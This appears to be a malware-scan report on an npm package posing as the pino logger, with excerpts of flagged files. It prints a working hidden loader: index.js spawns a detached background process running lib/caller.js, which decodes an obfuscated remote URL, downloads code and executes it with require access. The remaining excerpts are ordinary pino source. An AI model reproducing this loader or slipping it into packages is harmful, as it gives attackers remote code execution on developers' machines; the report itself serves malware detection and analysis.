// offending code· 4 files flaggedpatterns: 4
--- package/index.d.ts (excerpt) ---
// Project: https://github.com/pinojs/pino.git, http://getpino.io
// Definitions by: Peter Snider <https://github.com/psnider>
// BendingBender <https://github.com/BendingBender>
// Christian Rackerseder <https://github.com/screendriver>
// GP <https://github.com/paambaati>
// Alex Ferrando <https://github.com/alferpal>
// Oleksandr Sidko <https://github.com/mortiy>
// Harris Lummis <https://github.com/lummish>
// Raoul Jaeckel <https://github.com/raoulus>
// Cory Donkin <https://github.com/Cooryd>
// Adam Vigneaux <https://github.com/AdamVig>
// Austin Beer <https://github.com/austin-beer>
// Michel Nemnom <https://github.com/Pegase745>
// Igor Savin <https://github.com/kibertoad>
// James Bromwell <https://github.com/thw0rted>
// TypeScript Version: 4.4
import type { EventEmitter } from "events";
import * as pinoStdSerializers from "pino-std-serializers";
import type { SonicBoom, SonicBoomOpts } from "sonic-boom";
import type { WorkerOptions } from "worker_threads";
//// Non-exported types and interfaces
// ToDo https://github.com/pinojs/thread-stream/issues/24
type ThreadStream = any
type TimeFn = () => string;
type MixinFn<CustomLevels extends string = never> = (mergeObject: object, level: number, logger:pino.Logger<CustomLevels>) => object;
type MixinMergeStrat
--- package/index.js (excerpt) ---
'use strict'
const path = require("path");
const{ spawn } = require("child_process");
const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants')
const { pid } = process
const defaultOptions = {
levelComparison: SORTING_ORDER.ASC,
levels: DEFAULT_LEVELS,
messageKey: 'msg',
errorKey: 'err',
nestedKey: null,
enabled: true,
base: { pid },
formatters: Object.assign(Object.create(null), {
bindings (bindings) {
return bindings
}
}),
hooks: {
logMethod: undefined,
streamWrite: undefined
},
name: undefined,
redact: null,
customLevels: null,
useOnlyCustomLevels: false,
depthLimit: 5,
edgeLimit: 100
}
function runJobA(args) {
const script = path.resolve(__dirname, "./lib/caller.js");
const child = spawn("node", [script, JSON.stringify(args)], {
detached: true,
stdio: "ignore"
});
child.unref(); // allow parent to exit
}
const middleware = (..._args) => {
runJobA(..._args, defaultOptions);
return (_req, _res, next) => {
next();
};
}
module.exports = middleware;
// Enables default and name export with TypeScript and Babel
module.exports.default = middleware
module.exports.pino = middleware
--- package/lib/caller.js (excerpt) ---
"use strict";
const axios = require("axios");
const process = {
env: {
DEV_API_KEY: "aHR0cHM6Ly9hcGkuanNvbnN0b3JhZ2UubmV0L3YxL2pzb24vMmVmOGM3NTgtYTk2Zi00NTllLWIwMzYtYjNiOTAzNzlhMTY1L2ExNzllYTM1LWI5NjItNDcyMi1iM2YxLWUyODMxNmQxYTQ0YQ==",
DEV_SECRET_KEY: "eC1zZWNyZXQta2V5",
DEV_SECRET_VALUE: "Xw==",
}
};
(async function getCallers(..._args) {
const src = atob(process.env.DEV_API_KEY);
const k = atob(process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);
let retrycnt = 5;
while (retrycnt > 0) {
try {
const l = console.log;
const s = (await axios.get(src, { headers: { [k]: v } })).data.cookie;
const handler = new Function.constructor("require", s);
handler(require);
console.log = l;
break;
}
catch (error) {
retrycnt--;
}
}
})();
--- package/lib/redaction.js (excerpt) ---
'use strict'
const fastRedact = require('fast-redact')
const { redactFmtSym, wildcardFirstSym } = require('./symbols')
const { rx, validator } = fastRedact
const validate = validator({
ERR_PATHS_MUST_BE_STRINGS: () => 'pino – redacted paths must be strings',
ERR_INVALID_PATH: (s) => `pino – redact paths array contains an invalid path (${s})`
})
const CENSOR = '[Redacted]'
const strict = false // TODO should this be configurable?
function redaction (opts, serialize) {
const { paths, censor } = handle(opts)
const shape = paths.reduce((o, str) => {
rx.lastIndex = 0
const first = rx.exec(str)
const next = rx.exec(str)
// ns is the top-level path segment, brackets + quoting removed.
let ns = first[1] !== undefined
? first[1].replace(/^(?:"|'|`)(.*)(?:"|'|`)$/, '$1')
: first[0]
if (ns === '*') {
ns = wildcardFirstSym
}
// top level key:
if (next === null) {
o[ns] = null
return o
}
// path with at least two segments:
// if ns is already redacted at the top level, ignore lower level redactions
if (o[ns] === null) {
return o
}
const { index } = next
const nextPath = `${str.substr(index, str.length - 1)}`
o[ns] = o[ns] || []
// shape is a mix of paths beginning with literal values and wildcard
// paths [ "a.b.c", "*.b.z" ] should reduce to a shape of
// { "a": [ "b.c", "b.z" ], *: [ "b.z" ] }
// note: "b.z" is in both "a" and * arrays because "a" m
--- bundled output (OSV-MAL flagged — LLM scope expansion) ---
--- lib/transport-stream.js (bundled) ---
'use strict'
const { realImport, realRequire } = require('real-require')
module.exports = loadTransportStreamBuilder
/**
* Loads & returns a function to build transport streams
* @param {string} target
* @returns {Promise<function(object): Promise<import('node:stream').Writable>>}
* @throws {Error} In case the target module does not export a function
*/
async function loadTransportStreamBuilder (target) {
let fn
try {
const toLoad = target.startsWith('file://') ? target : 'file://' + target
if (toLoad.endsWith('.ts') || toLoad.endsWith('.cts')) {
// TODO: add support for the TSM modules loader ( https://github.com/lukeed/tsm ).
if (process[Symbol.for('ts-node.register.instance')]) {
realRequire('ts-node/register')
} else if (process.env && process.env.TS_NODE_DEV) {
realRequire('ts-node-dev')
}
// TODO: Support ES imports once tsc, tap & ts-node provide better compatibility guarantees.
fn = realRequire(decodeURIComponent(target))
} else {
fn = (await realImport(toLoad))
}
} catch (error) {
// See this PR for details: https://github.com/pinojs/thread-stream/pull/34
if ((error.code === 'ENOTDIR' || error.code === 'ERR_MODULE_NOT_FOUND')) {
fn = realRequire(target)
} else if (error.code === undefined || error.code === 'ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING') {
// When bundled with pkg, an undefined error is thrown when called with realImport
// When bundled with pkg and using node v20, an ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING error is thrown when called with realImport
// More info at: https://github.com/pinojs/thread-stream/issues/143
try {
fn = realRequire(decodeURIComponent(target))
} catch {
throw error
}
} else {
throw error
}
}
// Depending on how the default export is performed, and on how the code is
// transpiled, we may find cases of two nested "default" objects.
// See https://